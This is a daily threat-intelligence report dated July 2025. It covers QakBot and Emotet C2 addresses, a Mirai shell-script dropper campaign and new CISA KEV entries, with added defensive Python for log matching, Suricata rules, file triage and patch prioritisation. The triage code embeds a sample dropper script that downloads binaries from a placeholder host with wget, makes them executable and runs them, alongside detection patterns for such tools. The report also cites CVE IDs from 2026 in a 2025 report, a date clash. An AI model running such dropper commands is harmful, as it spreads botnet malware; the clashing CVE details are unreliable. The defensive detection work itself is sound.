Daily Threat Intelligence Report - 2025-07-14
Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed across five IPs by Feodotracker, representing an immediate risk to enterprise endpoints. A confirmed Mirai ELF sample (MalwareBazaar) is being distributed via at least ten malicious shell-script download URLs (URLhaus), signaling an active IoT/Linux botnet recruitment campaign. CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog, including a critical Drupal Core SQL injection (CVE-2026-9082) and a Langflow CORS/RCE flaw (CVE-2025-34291), requiring immediate patching action. SOC teams should block all five Feodotracker C2 IPs at the egress firewall and proxy, patch or isolate Drupal and Langflow instances, and increase monitoring for outbound connections to URLhaus-listed hosts.
Active QakBot & Emotet C2 Infrastructure - Multi-Family Banking Trojan Campaign
Severity: CRITICAL | Threat actor: TA505
Feodotracker has confirmed five active command-and-control servers operating in the last 24 hours: four serving QakBot (50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and one serving Emotet (162.243.103.246). Both families are used by initial-access brokers, attributed here to TA505 and its affiliates, to establish persistent footholds that are later monetized through ransomware deployment (e.g., Cl0p, Black Basta). The spread of C2 infrastructure across the US, UK, and Japan indicates deliberate diversification to defeat geo-based blocking; blocking should therefore be keyed on the specific addresses rather than on country of origin. Any outbound connection to these IPs from an enterprise endpoint should be treated as a confirmed compromise: isolate the host, preserve volatile evidence (running processes, network connections, scheduled tasks) before remediation, and open a full forensic investigation.
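The detection step described above, as an added example that is not part of the original report: the five Feodotracker addresses are matched against outbound connection records so that each internal host that contacted a C2 is listed for isolation, and a Suricata egress rule is emitted per address. The conn.log lines are constructed for this example (Zeek-style tab-separated fields; the 10.20.30.x hosts and 142.250.72.14/8.8.8.8 destinations are placeholders, not observed traffic), and the SID range 9000001+ is an assumption.

```python
from collections import defaultdict

# Feodotracker C2 addresses from the report, keyed by malware family.
C2_IOCS = {
    "50.16.16.211": "QakBot",
    "34.204.119.63": "QakBot",
    "178.62.3.223": "QakBot",
    "27.133.154.218": "QakBot",
    "162.243.103.246": "Emotet",
}

# Constructed sample in Zeek conn.log column order:
# ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto. Not real traffic.
SAMPLE_CONN_LOG = """\
1752451200.101\tCx1\t10.20.30.41\t51234\t142.250.72.14\t443\ttcp
1752451201.500\tCx2\t10.20.30.41\t51235\t50.16.16.211\t443\ttcp
1752451202.000\tCx3\t10.20.30.77\t40001\t162.243.103.246\t8080\ttcp
1752451203.250\tCx4\t10.20.30.41\t51236\t50.16.16.211\t443\ttcp
1752451204.000\tCx5\t10.20.30.90\t53000\t8.8.8.8\t53\tudp
"""


def parse_conn_log(text):
    """Yield (src_ip, dst_ip, dst_port) from conn.log lines, skipping comments."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) < 7:
            continue  # truncated line; ignore rather than misparse
        yield fields[2], fields[4], int(fields[5])


def find_c2_contacts(text, iocs=C2_IOCS):
    """Return {src_ip: {"families": set, "dsts": set, "count": int}} for every
    internal host that contacted a listed C2 address."""
    hits = defaultdict(lambda: {"families": set(), "dsts": set(), "count": 0})
    for src, dst, dport in parse_conn_log(text):
        if dst in iocs:
            entry = hits[src]
            entry["families"].add(iocs[dst])
            entry["dsts"].add(f"{dst}:{dport}")
            entry["count"] += 1
    return dict(hits)


def suricata_rules(iocs=C2_IOCS, base_sid=9000001):
    """Emit one Suricata alert rule per C2 IP for traffic leaving $HOME_NET.
    SIDs are assigned sequentially from base_sid (assumed local range)."""
    rules = []
    for i, (ip, family) in enumerate(sorted(iocs.items())):
        rules.append(
            f'alert ip $HOME_NET any -> {ip} any '
            f'(msg:"Feodotracker {family} C2 contact {ip}"; '
            f'classtype:trojan-activity; sid:{base_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    for host, info in find_c2_contacts(SAMPLE_CONN_LOG).items():
        print(f"ISOLATE {host}: {info['count']} connection(s) to "
              f"{sorted(info['dsts'])} ({', '.join(sorted(info['families']))})")
    print("\n".join(suricata_rules()))
```

Feed the real conn.log (or proxy/NetFlow export mapped to the same three columns) to `find_c2_contacts`; every host it returns is a candidate for isolation, and the rule list can be appended to a local rules file and loaded with a Suricata reload.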
Active Mirai Botnet Campaign - Linux/IoT Shell Script Dropper Distribution via URLhaus
Severity: HIGH | Threat actor: Unknown
MalwareBazaar has confirmed an active Mirai ELF binary (SHA256: a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da, tags: elf, Mirai) circulating alongside multiple shell-script (sh-tagged) samples, while URLhaus has simultaneously flagged ten malicious URLs actively serving bin.sh and similar dropper scripts from IPs across multiple Asia-Pacific ranges. This pattern is consistent with automated exploitation of exposed Linux services and IoT devices, commonly targeting default credentials, Telnet, SSH, and unpatched RCE vulnerabilities, to recruit devices into a DDoS botnet; the dropper script typically fetches a per-architecture binary, which is why a single campaign ships many ELF variants. The AlienVault OTX pulse 'Untangling a Linux Incident With an OpenAI Twist (Part 2)' corroborates simultaneous multi-actor Linux endpoint compromises including cryptominer deployment, suggesting these URLhaus drop-points may serve multiple payloads beyond Mirai. Organizations with internet-exposed Linux servers, NAS devices, routers, or IP cameras are at heightened risk and should audit for unauthorized outbound connections immediately; because only one hash is published here, hash matching alone will miss sibling builds, so hunt for the dropper behaviour (downloads into world-writable directories followed by chmod and execution) as well.
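A triage routine for artifacts recovered from a suspect Linux host, as an added example that is not part of the original report: it hashes each file against the MalwareBazaar SHA256 above, reads the ELF header to report the target architecture, and flags shell scripts that show the fetch/chmod/execute sequence typical of Mirai-style bin.sh droppers. The dropper heuristics and the sample script are assumptions based on commonly observed patterns, not derived from the URLhaus samples; 203.0.113.10 is a documentation address, and the ELF bytes are a constructed minimal header.

```python
import hashlib
import re

# SHA256 of the Mirai ELF sample reported by MalwareBazaar.
KNOWN_BAD_SHA256 = {
    "a7d2465bd9f87988a23979b0adc7d4e660eea1ec1fdad21792e1500b33b6a4da": "Mirai (MalwareBazaar)",
}

# ELF e_machine values for architectures Mirai builds commonly target.
ELF_MACHINE = {0x03: "x86", 0x04: "m68k", 0x08: "MIPS", 0x14: "PowerPC",
               0x28: "ARM", 0x2A: "SuperH", 0x3E: "x86-64", 0xB7: "AArch64"}

# Behavioural indicators for download-and-execute scripts (assumption: generic
# Mirai-style patterns, not extracted from this report's samples).
DROPPER_PATTERNS = {
    "fetch_tool": re.compile(r"\b(wget|curl|tftp)\b"),
    "writable_dir": re.compile(r"\bcd\s+/(tmp|var/run|dev/shm|mnt)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"),
    "cleanup": re.compile(r"\brm\s+-r?f\b"),
    "multi_arch": re.compile(r"\b(mips|mipsel|arm[0-9]?|x86|sh4|ppc|m68k)\b"),
}

# Constructed sample dropper (placeholder URL, not a live drop-point).
SAMPLE_BIN_SH = b"""#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
for arch in mips mipsel arm7 x86; do
  wget http://203.0.113.10/bins/$arch -O $arch
  chmod 777 $arch
  ./$arch
done
rm -rf $arch
"""

# Constructed 64-byte ELF header: ELFCLASS32, little-endian, ET_EXEC, e_machine=MIPS.
SAMPLE_ELF = (b"\x7fELF\x01\x01\x01" + b"\x00" * 9
              + b"\x02\x00" + b"\x08\x00" + b"\x00" * 44)


def elf_machine(data: bytes):
    """Return the architecture name from the ELF header, or None if not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    order = "little" if data[5] == 1 else "big"   # EI_DATA selects endianness
    machine = int.from_bytes(data[18:20], order)   # e_machine at offset 0x12
    return ELF_MACHINE.get(machine, f"unknown(0x{machine:x})")


def classify_artifact(data: bytes, known=KNOWN_BAD_SHA256):
    """Hash-match, ELF-inspect, and dropper-score a single file's contents."""
    sha = hashlib.sha256(data).hexdigest()
    result = {"sha256": sha, "known_bad": known.get(sha),
              "elf_arch": elf_machine(data), "dropper_indicators": []}
    if result["elf_arch"] is None:  # only score text-like files for dropper behaviour
        text = data.decode("utf-8", errors="replace")
        result["dropper_indicators"] = [n for n, rx in DROPPER_PATTERNS.items()
                                        if rx.search(text)]
    if result["known_bad"]:
        result["verdict"] = "MALICIOUS"
    elif len(result["dropper_indicators"]) >= 3:
        result["verdict"] = "SUSPICIOUS_DROPPER"
    else:
        result["verdict"] = "UNKNOWN"
    return result


if __name__ == "__main__":
    for name, blob in (("bin.sh", SAMPLE_BIN_SH), ("mips", SAMPLE_ELF)):
        r = classify_artifact(blob)
        print(f"{name}: {r['verdict']} sha256={r['sha256'][:16]}... "
              f"arch={r['elf_arch']} indicators={r['dropper_indicators']}")
```

Run `classify_artifact(open(path, "rb").read())` over /tmp, /var/run and /dev/shm on a suspect host; a SUSPICIOUS_DROPPER verdict on a script, or an unexpected MIPS/ARM binary on an x86 server, warrants the same isolation and outbound-connection audit the report calls for even when the hash does not match the published sample.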
CISA KEV Alert - Critical Vulnerabilities in Drupal Core, Langflow, and Trend Micro Apex One Require Immediate Patching
Severity: MEDIUM | Threat actor: Unknown
CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog, three of which present immediate high-severity risk to enterprise environments: CVE-2026-9082 (Drupal Core SQL injection enabling privilege escalation and RCE), CVE-2025-34291 (Langflow CORS misconfiguration combined with a SameSite=None session cookie, allowing a malicious origin to make authenticated cross-origin requests and reach arbitrary code execution), and CVE-2026-34926 (Trend Micro Apex One directory traversal enabling malicious code injection to managed agents). The remaining two additions are legacy vulnerabilities, CVE-2008-4250 (Windows Server Service RPC buffer overflow) and CVE-2009-1537 (Microsoft DirectX QuickTime parser RCE); their inclusion shows that exploitation of unpatched legacy systems is still observed in the wild. All five carry remediation due dates under CISA BOD 22-01; organizations running Drupal CMS, Langflow AI pipelines, or Trend Micro Apex One on-premise should treat this as an emergency patching event, and where Langflow cannot be patched immediately it should at minimum be removed from direct internet exposure. The Langflow vulnerability is particularly concerning given its presence in AI/ML development pipelines, which are increasingly targeted as entry points into sensitive data environments because they routinely hold API keys, model credentials, and training data.
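A way to turn the KEV additions into a prioritized patch list, as an added example that is not part of the original report: a catalog excerpt in the layout of CISA's known_exploited_vulnerabilities.json is cross-referenced against an asset inventory and sorted by BOD 22-01 due date. The CVE IDs, vendors and products follow the report; the dateAdded and dueDate values, the requiredAction text, the inventory hosts, and the vendor/product matching heuristic are all assumptions constructed for this example.

```python
import json
from datetime import date

# Constructed excerpt in the shape of CISA's KEV JSON feed. Only fields used
# below are included; dates are assumed, not taken from the catalog.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2026-9082", "vendorProject": "Drupal", "product": "Drupal core",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-34291", "vendorProject": "Langflow", "product": "Langflow",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-34926", "vendorProject": "Trend Micro", "product": "Apex One",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2008-4250", "vendorProject": "Microsoft", "product": "Windows",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2009-1537", "vendorProject": "Microsoft", "product": "DirectX",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed asset inventory (hostnames and versions are placeholders).
INVENTORY = [
    {"host": "web-01", "vendor": "Drupal", "product": "Drupal core", "version": "10.2"},
    {"host": "ml-dev-03", "vendor": "Langflow", "product": "Langflow", "version": "1.0"},
    {"host": "epp-mgr", "vendor": "Trend Micro", "product": "Apex One", "version": "SP1"},
    {"host": "file-srv-legacy", "vendor": "Microsoft", "product": "Windows Server 2003", "version": "SP2"},
    {"host": "db-02", "vendor": "PostgreSQL", "product": "PostgreSQL", "version": "15"},
]


def _matches(kev_entry, asset):
    """Heuristic match (assumption): same vendor, and the asset product name
    starts with the first word of the KEV product name, case-insensitively."""
    if kev_entry["vendorProject"].lower() != asset["vendor"].lower():
        return False
    first_word = kev_entry["product"].lower().split()[0]
    return asset["product"].lower().startswith(first_word)


def kev_exposure(kev_json, inventory, today, added_since=None):
    """Return exposures sorted by urgency: [{host, cveID, product, days_to_due,
    overdue, ransomware}]. If added_since is given, only KEV entries added on
    or after that date are considered (e.g. today's additions)."""
    catalog = json.loads(kev_json)["vulnerabilities"]
    exposures = []
    for entry in catalog:
        if added_since and date.fromisoformat(entry["dateAdded"]) < added_since:
            continue
        due = date.fromisoformat(entry["dueDate"])
        for asset in inventory:
            if _matches(entry, asset):
                days = (due - today).days
                exposures.append({
                    "host": asset["host"], "cveID": entry["cveID"],
                    "product": asset["product"], "days_to_due": days,
                    "overdue": days < 0,
                    "ransomware": entry["knownRansomwareCampaignUse"] == "Known",
                })
    # Ransomware-linked entries first, then soonest due date.
    exposures.sort(key=lambda e: (not e["ransomware"], e["days_to_due"], e["host"]))
    return exposures


if __name__ == "__main__":
    for e in kev_exposure(KEV_SAMPLE, INVENTORY, date(2025, 7, 14)):
        flag = "RANSOMWARE " if e["ransomware"] else ""
        print(f"{flag}{e['host']}: {e['cveID']} ({e['product']}) due in {e['days_to_due']} days")
```

Replace `KEV_SAMPLE` with the downloaded catalog and `INVENTORY` with a CMDB export; the output order is the patch queue, and anything with `overdue` set is a BOD 22-01 breach for federal agencies and a reasonable escalation trigger for everyone else.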